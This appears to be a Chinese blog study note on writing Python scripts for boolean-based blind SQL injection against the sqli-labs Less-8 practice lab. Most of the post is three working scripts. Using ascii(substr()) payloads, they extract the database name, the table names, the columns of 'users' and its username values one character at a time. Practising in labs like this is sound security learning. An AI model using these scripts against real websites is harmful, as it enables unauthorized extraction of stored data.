基础SQL注入过了一遍,盲注一直不太熟,在sqli-labs上练习盲注时也是找到注入点后上sqlmap。今天学习用python写sql注入脚本,才发现很多语句不熟,从网上找了一篇教程,自己照着写了写,有些地方自己改了改,感觉收获很大。[这是参照的文章](https://www.cnblogs.com/lzlzzzzzz/p/13998552.html),想了想,这也算转载吧。。。
以sqli-labs第八关为例写的
爆数据库名和表名
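import requests

s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
# Less-8 is boolean-based blind: this text appears in the page only when the
# injected condition is true, and its presence/absence is the only signal.
SUCCESS_MARK = "You are in..........."
# Characters are recovered through ascii(): a raw character compared with a
# number would be coerced to 0 in MySQL, so comparing chr directly does not work.
#headers={'cookie':''}


def hit(payload):
    """Return True when the page for url+payload contains the true-condition text."""
    return SUCCESS_MARK in s.get(url + payload).text


def find_count(make_payload, candidates, what):
    """Return the first value in candidates whose payload evaluates true.

    make_payload maps a candidate int to the payload string. Raises
    RuntimeError when nothing matches, instead of letting a later line fail
    with NameError on a variable that was never assigned.
    """
    for value in candidates:
        if hit(make_payload(value)):
            return value
    raise RuntimeError(what + " not found within the searched range")


def read_string(make_payload, length):
    """Recover a string of `length` characters, one position at a time.

    make_payload maps (position, ascii_code) to the payload string; substr()
    positions are 1-based. A position that matches no code in 1..127 is
    skipped, so a non-ASCII character leaves a gap in the result.
    """
    result = ''
    for pos in range(1, length + 1):
        for code in range(1, 128):
            if hit(make_payload(pos, code)):
                result += chr(code)
                break
    return result


# length of the database name
databaselen = find_count(
    lambda l: "' and length(database())=" + str(l) + "%23",
    range(1, 30), "database length")
print("database_length:" + str(databaselen))

# database name
database_name = read_string(
    lambda pos, code: "' and ascii(substr(database()," + str(pos) + ",1))=" + str(code) + "%23",
    databaselen)
print("database_name:", database_name)

# number of tables in the current database
tableNumber = find_count(
    lambda l: "' and (select count(table_name) from information_schema.tables where table_schema=database())=" + str(l) + "%23",
    range(1, 50), "table count")
print("tableNumber:", tableNumber)

# table names: length first, then one character per position
for l in range(0, tableNumber):  # which table (limit offset)
    table_subquery = ("(select table_name from information_schema.tables "
                      "where table_schema=database() limit " + str(l) + ",1)")
    tableLen = find_count(
        lambda i: "' and length(substr(" + table_subquery + ",1))=" + str(i) + "%23",
        range(1, 50), "table" + str(l + 1) + " name length")
    print("table" + str(l + 1) + ":", tableLen)
    # Positions run 1..tableLen: substr(x, 0, 1) is '' and ascii('') is 0, which
    # never matches a code in 1..127, so starting at 0 only wasted 127 requests.
    table_name = read_string(
        lambda m, n: "' and ascii(substr(" + table_subquery + "," + str(m) + ",1))=" + str(n) + "%23",
        tableLen)
    print("tableName" + str(l + 1) + ":" + table_name)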
爆列名
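import requests

s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
# Less-8 is boolean-based blind: this text appears in the page only when the
# injected condition is true, and its presence/absence is the only signal.
SUCCESS_MARK = "You are in..........."


def hit(payload):
    """Return True when the page for url+payload contains the true-condition text."""
    return SUCCESS_MARK in s.get(url + payload).text


def find_count(make_payload, candidates, what):
    """Return the first value in candidates whose payload evaluates true.

    make_payload maps a candidate int to the payload string. Raises
    RuntimeError when nothing matches, instead of letting a later line fail
    with NameError on a variable that was never assigned.
    """
    for value in candidates:
        if hit(make_payload(value)):
            return value
    raise RuntimeError(what + " not found within the searched range")


def read_string(make_payload, length):
    """Recover a string of `length` characters, one position at a time.

    make_payload maps (position, ascii_code) to the payload string; substr()
    positions are 1-based. A position that matches no code in 1..127 is
    skipped, so a non-ASCII character leaves a gap in the result.
    """
    result = ''
    for pos in range(1, length + 1):
        for code in range(1, 128):
            if hit(make_payload(pos, code)):
                result += chr(code)
                break
    return result


# number of columns; the table ('users') is picked by hand from the previous step
columnNumber = find_count(
    lambda l: "' and (select count(column_name) from information_schema.columns where table_name='users')=" + str(l) + "%23",
    range(1, 50), "column count")
print("columnNumber:", columnNumber)

# column names: length first, then one character per position
for l in range(0, columnNumber):  # which column (limit offset)
    column_subquery = ("(select column_name from information_schema.columns "
                       "where table_name='users' limit " + str(l) + ",1)")
    columnLen = find_count(
        lambda i: "' and length(substr(" + column_subquery + ",1))=" + str(i) + "%23",
        range(1, 50), "column" + str(l + 1) + " name length")
    print("column" + str(l + 1) + "Len:", columnLen)
    columnName = read_string(
        lambda m, n: "' and ascii(substr(" + column_subquery + "," + str(m) + ",1))=" + str(n) + "%23",
        columnLen)
    print("columnName" + str(l + 1) + ":" + columnName)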
爆指定字段(手动指定)
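import requests

s = requests.session()
url = "http://192.168.43.190/sqli-labs/Less-8/?id=1"
# Less-8 is boolean-based blind: this text appears in the page only when the
# injected condition is true, and its presence/absence is the only signal.
SUCCESS_MARK = "You are in..........."


def hit(payload):
    """Return True when the page for url+payload contains the true-condition text."""
    return SUCCESS_MARK in s.get(url + payload).text


def find_count(make_payload, candidates, what):
    """Return the first value in candidates whose payload evaluates true.

    make_payload maps a candidate int to the payload string. Raises
    RuntimeError when nothing matches (e.g. a row count or value length
    beyond the range tried), instead of letting a later line fail with
    NameError on a variable that was never assigned.
    """
    for value in candidates:
        if hit(make_payload(value)):
            return value
    raise RuntimeError(what + " not found within the searched range")


def read_string(make_payload, length):
    """Recover a string of `length` characters, one position at a time.

    make_payload maps (position, ascii_code) to the payload string; substr()
    positions are 1-based. A position that matches no code in 1..127 is
    skipped, so a non-ASCII character leaves a gap in the result.
    """
    result = ''
    for pos in range(1, length + 1):
        for code in range(1, 128):
            if hit(make_payload(pos, code)):
                result += chr(code)
                break
    return result


# number of rows; column 'username' of table 'users' is picked by hand
shujuNumber = find_count(
    lambda l: "' and (select count(username) from users)=" + str(l) + "%23",
    range(1, 499), "row count")
print("数据条数:", shujuNumber)

# row values: length first, then one character per position
for l in range(0, shujuNumber):  # which row (limit offset)
    row_subquery = "(select username from users limit " + str(l) + ",1)"
    shujuLen = find_count(
        lambda i: "' and length(substr(" + row_subquery + ",1))=" + str(i) + "%23",
        range(1, 20), "row " + str(l + 1) + " value length")
    shuju = read_string(
        lambda m, n: "' and ascii(substr(" + row_subquery + "," + str(m) + ",1))=" + str(n) + "%23",
        shujuLen)
    print(l + 1, ":", shuju)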
用起来体验不是太好(用起来要改的地方不少),二分法比我这种快,不过目前暂时够用了